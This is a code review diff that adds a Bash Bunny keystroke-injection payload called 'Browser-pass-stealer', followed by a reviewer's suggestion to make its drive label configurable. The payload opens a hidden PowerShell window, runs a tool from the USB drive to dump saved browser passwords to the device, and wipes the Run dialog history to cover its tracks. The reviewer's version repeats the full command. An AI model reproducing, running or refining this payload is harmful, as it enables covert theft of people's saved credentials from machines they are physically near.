payloads/library/Browser-pass-stealer/payload.txt

```diff
@@ -0,0 +1,8 @@
+LED R 100
+ATTACKMODE HID STORAGE
+QUACK DELAY 1000
+QUACK GUI r
+QUACK DELAY 75
+QUACK STRING "powershell -windowstyle hidden "'$D'" =Get-WMIObject Win32_Volume | ? { "'$_.Label'" -eq 'uf' } | select name;cd "'$D.name'";./s /stext p;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

```

Comment:
I would recommend using a variable assignment for the drive label as not everyone's configuration will have the same drive label name. This makes user configuration much easier. 

You can do this by adding it to the top of your payload. For example with line: 
```
DRIVE_LABEL="BashBunny"
QUACK STRING "powershell -windowstyle hidden "'$D'" =Get-WMIObject Win32_Volume | ? { "'$_.Label'" -eq '$DRIVE_LABEL' } | select name;cd "'$D.name'";./s /stext p;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
```